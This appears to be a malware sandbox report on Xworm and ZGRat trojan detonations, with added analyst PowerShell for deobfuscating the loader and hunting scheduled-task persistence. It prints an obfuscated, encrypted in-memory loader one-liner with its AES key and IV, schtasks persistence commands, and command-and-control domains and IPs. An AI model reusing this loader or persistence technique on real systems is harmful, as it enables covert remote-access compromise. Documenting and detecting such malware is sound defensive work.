C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
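
The two cmd.exe one-liners recorded in this report (loader.cmd earlier, windows.cmd in the Processes list above) are the same loader built twice: every .Replace('junk', '') element rebuilds one .NET member name, the array is indexed in a different order per build, and each build carries its own AES-256 key and IV as base64 literals. What follows is an added analyst helper, not code from the report or from the sample. Resolve-ReplaceArray recovers the member names from a captured command line, and Expand-CmdLoaderPayload re-runs the loader's own extraction steps against the dropped .cmd but stops at WriteAllBytes and a SHA-256 instead of Assembly.Load and EntryPoint.Invoke. The .cmd body is not shown in the report, so the two characters skipped by Substring(2) are assumed to be a batch comment marker; the output directory and file names are placeholders; and the files it writes are the live payloads, so run it only inside an isolated analysis VM.

```powershell
# Added analyst helper; not code from the sandbox report or from the sample.
# Mirrors the loader's pipeline: ReadLines(<its own .cmd>) -> ElementAt(5) and (6)
# -> Substring(2) -> FromBase64String -> AES-CBC/PKCS7 decrypt -> GZip decompress,
# then WriteAllBytes + Get-FileHash instead of Assembly.Load + EntryPoint.Invoke.

function Resolve-ReplaceArray {
    # Resolve every 'junkLoadjunk'.Replace('junk', '') element in a captured command
    # line to its real .NET member name, in array order, so $arr[5] etc. become readable.
    param([Parameter(Mandatory)][string]$CommandLine)
    $pattern = "'([^']*)'\.Replace\('([^']*)',\s*''\)"
    foreach ($m in [regex]::Matches($CommandLine, $pattern)) {
        $m.Groups[1].Value.Replace($m.Groups[2].Value, '')
    }
}

function Expand-CmdLoaderPayload {
    # Decrypt and decompress the assemblies stored as base64 lines inside the .cmd.
    param(
        [Parameter(Mandatory)][string]$CmdPath,    # loader.cmd / windows.cmd as dropped
        [Parameter(Mandatory)][string]$KeyBase64,  # the .Key literal from the command line
        [Parameter(Mandatory)][string]$IvBase64,   # the .IV literal from the command line
        [int[]]$LineIndex = @(5, 6),               # ElementAt() indexes the loader reads (0-based)
        [int]$Skip = 2,                            # Substring(2): assumed batch comment prefix
        [string]$OutDir = '.'
    )
    $lines = [System.IO.File]::ReadAllLines($CmdPath)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [Convert]::FromBase64String($KeyBase64)
    $aes.IV      = [Convert]::FromBase64String($IvBase64)
    try {
        foreach ($i in $LineIndex) {
            if ($i -ge $lines.Count) { Write-Warning "no line $i in $CmdPath"; continue }
            $cipher = [Convert]::FromBase64String($lines[$i].Substring($Skip))
            $dec = $aes.CreateDecryptor()
            try     { $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length) }
            finally { $dec.Dispose() }
            $src = New-Object System.IO.MemoryStream(,$plain)
            $dst = New-Object System.IO.MemoryStream
            $gz  = New-Object System.IO.Compression.GZipStream($src, [System.IO.Compression.CompressionMode]::Decompress)
            $gz.CopyTo($dst); $gz.Dispose(); $src.Dispose()
            $bytes = $dst.ToArray(); $dst.Dispose()
            $name = '{0}_line{1}.bin' -f [System.IO.Path]::GetFileNameWithoutExtension($CmdPath), $i
            $dest = Join-Path $OutDir $name
            [System.IO.File]::WriteAllBytes($dest, $bytes)
            [pscustomobject]@{
                Line   = $i
                Bytes  = $bytes.Length
                IsPE   = ($bytes.Length -gt 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)  # 'MZ'
                SHA256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $dest).Hash
                Path   = $dest
            }
        }
    }
    finally { $aes.Dispose() }
}

# Worked on the $yqWK array from the loader.cmd command line in this report (copied
# from the report, one element per line; the regex does not care about line breaks).
$captured = @'
'LiJdgoadiJdg'.Replace('iJdg', ''),
'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),
'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),
'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),
'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),
'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),
'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),
'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),
'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),
'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),
'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),
'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),
'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),
'InNqdDvNqdDokeNqdD'.Replace('NqdD', '')
'@
$names = @(Resolve-ReplaceArray -CommandLine $captured)
for ($i = 0; $i -lt $names.Count; $i++) { '{0,2}  {1}' -f $i, $names[$i] }

# Against the dropped file (paths are placeholders; key and IV are the loader.cmd values):
# Expand-CmdLoaderPayload -CmdPath 'C:\triage\windows_update\loader.cmd' -OutDir 'C:\triage\out' `
#     -KeyBase64 'Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=' -IvBase64 'tLQNTWTubc+g+4ALClBhsw=='
```

For the loader.cmd array the indexes the one-liner actually dereferences (0, 2, 3, 5, 7, 8, 9, 10, 11, 13) resolve to Load, CopyTo, Decompress, FromBase64String, EntryPoint, ReadLines, ElementAt, CreateDecryptor, TransformFinalBlock and Invoke; ChangeExtension, GetCurrentProcess, Split and MainModule are never referenced and only pad the array. The windows.cmd build shuffles the same fourteen names into a different order and ships a different key and IV, so read all three from the captured command line rather than hard-coding them. The loader locates its own file through [Console]::Title, which its first statement sets to the .cmd path, and both builds invoke the assembly taken from line index 6 before the one from index 5.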

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 52.111.229.43:443 tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp

Files

memory/3676-0-0x000001C4FD590000-0x000001C4FD5B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orbceapg.1ev.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3676-10-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp

memory/3676-12-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-11-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-13-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-14-0x000001C500000000-0x000001C500044000-memory.dmp

memory/3676-15-0x000001C500050000-0x000001C5000C6000-memory.dmp

memory/3292-25-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp

memory/3292-26-0x0000028E360B0000-0x0000028E360C0000-memory.dmp

memory/3292-29-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp

memory/3676-30-0x000001C498020000-0x000001C498034000-memory.dmp

memory/3676-31-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp

memory/3676-32-0x00007FFD39950000-0x00007FFD39A0E000-memory.dmp

memory/3676-33-0x000001C4982F0000-0x000001C498300000-memory.dmp

memory/3676-34-0x000001C498300000-0x000001C498316000-memory.dmp

memory/3676-35-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp

memory/3676-37-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp

memory/3676-38-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-39-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-40-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-41-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

91s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fresh.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2360 set thread context of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 1388 wrote to memory of 3488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1388 wrote to memory of 3488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1388 wrote to memory of 3488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2360 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fresh.exe

"C:\Users\Admin\AppData\Local\Temp\fresh.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\Temp\bddddsx"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\fresh.exe" "C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe"
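
fresh.exe in this analysis persists by copying itself to C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe and registering a scheduled task, "Nano", that relaunches the copy every ten minutes. The block below is an added hunting helper, not code from the report or from the sample. Test-SchtasksCreateCommandLine scores a captured schtasks /create command line (Sysmon Event ID 1, Security 4688 or EDR process telemetry) for the shape seen here, an action under a user-writable directory with a repetition interval of an hour or less, and Get-SuspiciousScheduledTask applies the same test to the live task store through the ScheduledTasks module. The directory pattern, the 60-minute threshold and the list of script extensions are assumptions to tune.

```powershell
# Added hunting helpers; not code from the sandbox report or from the sample.
# Shape seen above: schtasks /create /sc minute /mo 10 /tn "Nano"
#   /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

# Directories a standard user can write to (assumption: tune for your estate).
$UserWritablePattern = '(?i)\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|ProgramData|Users\\Public|Windows\\Temp)\\'

function Get-SchtasksSwitch {
    # Value of /<Switch> in a schtasks command line, "quoted" or bare; '' when absent.
    param([string]$CommandLine, [string]$Switch)
    $m = [regex]::Match($CommandLine, "(?i)/$Switch\s+(?:`"([^`"]*)`"|(\S+))")
    if (-not $m.Success) { return '' }
    if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value }
}

function Test-SchtasksCreateCommandLine {
    # Score one captured "schtasks /create ..." line (Sysmon EID 1, Security 4688, EDR).
    param([Parameter(Mandatory)][string]$CommandLine, [int]$MaxRepeatMinutes = 60)
    if ($CommandLine -notmatch '(?i)schtasks(\.exe)?"?\s+/create(\s|$)') { return $null }
    $sc = (Get-SchtasksSwitch $CommandLine 'sc').ToLower()
    $mo = Get-SchtasksSwitch $CommandLine 'mo'
    $mo = if ($mo -match '^\d+$') { [int]$mo } else { 1 }          # /mo defaults to 1
    # /tr "'C:\x\y.exe'" keeps the inner single quotes: strip both quote kinds, then
    # cut the executable off any arguments that follow it.
    $target = (Get-SchtasksSwitch $CommandLine 'tr').Trim(" '`"")
    $exe = if ($target -match '^(.*?\.(exe|cmd|bat|ps1|vbs|js|dll))(\s|$)') { $Matches[1] } else { $target }
    $repeatMin = switch ($sc) { 'minute' { $mo } 'hourly' { 60 * $mo } default { $null } }
    $schedule = if ($sc) { "/sc $sc /mo $mo" } else { '(none)' }
    $userWritable = [bool]($exe -match $UserWritablePattern)
    $shortRepeat  = ($null -ne $repeatMin) -and ($repeatMin -le $MaxRepeatMinutes)
    [pscustomobject]@{
        TaskName     = Get-SchtasksSwitch $CommandLine 'tn'
        Schedule     = $schedule
        RepeatMin    = $repeatMin
        Target       = $exe
        UserWritable = $userWritable
        ShortRepeat  = $shortRepeat
        Forced       = [bool]($CommandLine -match '(?i)\s/f(\s|$)')
        Suspicious   = $userWritable -and $shortRepeat
    }
}

function Get-SuspiciousScheduledTask {
    # Walk the live task store for the same shape (ScheduledTasks module, Win8/2012+).
    param([int]$MaxRepeatMinutes = 60)
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }               # COM-handler or mail actions
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim(" '`""))
            if ($exe -notmatch $UserWritablePattern) { continue }
            $repeat = $null
            foreach ($t in $task.Triggers) {
                if ($t.Repetition -and $t.Repetition.Interval) {   # ISO 8601, PT10M for /mo 10
                    $span = [System.Xml.XmlConvert]::ToTimeSpan($t.Repetition.Interval)
                    if ($null -eq $repeat -or $span -lt $repeat) { $repeat = $span }
                }
            }
            [pscustomobject]@{
                Task        = $task.TaskPath + $task.TaskName
                Author      = $task.Author
                RunAs       = $task.Principal.UserId
                Execute     = $exe
                Arguments   = $action.Arguments
                RepeatEvery = $repeat
                ShortRepeat = ($null -ne $repeat -and $repeat.TotalMinutes -le $MaxRepeatMinutes)
                StillOnDisk = Test-Path -LiteralPath $exe
            }
        }
    }
}

# Worked on the command line captured above (copied from the report):
Test-SchtasksCreateCommandLine -CommandLine 'schtasks /create /sc minute /mo 10 /tn "Nano" /tr "''C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe''" /f'
# Live hunt on the analysis host or a suspect endpoint:
# Get-SuspiciousScheduledTask | Format-Table -AutoSize
```

In this detonation the schtasks.exe process is a child of a "cmd.exe" /C wrapper rather than of fresh.exe, so correlate on the command line text rather than on the parent image. Legitimate updaters also register tasks that run from AppData, so treat UserWritable on its own as a lead and the combination with a short repetition interval and a freshly copied binary as the finding.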

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 vbdsg.duckdns.org udp
GB 57.128.155.22:8896 vbdsg.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp

Files

memory/2360-0-0x00000000008A0000-0x00000000008CE000-memory.dmp

memory/2360-1-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/2360-2-0x0000000005210000-0x0000000005220000-memory.dmp

memory/2360-3-0x0000000005290000-0x00000000052F6000-memory.dmp

memory/2360-4-0x00000000058B0000-0x0000000005E54000-memory.dmp

memory/5072-5-0x0000000000400000-0x0000000000410000-memory.dmp

memory/5072-6-0x00000000051F0000-0x000000000528C000-memory.dmp

memory/5072-7-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/2360-11-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/5072-12-0x0000000005450000-0x0000000005460000-memory.dmp

memory/5072-13-0x0000000005B00000-0x0000000005B92000-memory.dmp

memory/5072-14-0x0000000005AA0000-0x0000000005AAA000-memory.dmp

memory/5072-15-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/5072-16-0x0000000005450000-0x0000000005460000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:51

Platform

win10v2004-20240412-en

Max time kernel

77s

Max time network

92s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3568 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 5084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4908 wrote to memory of 5084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 3796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3796 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3796 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3796 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
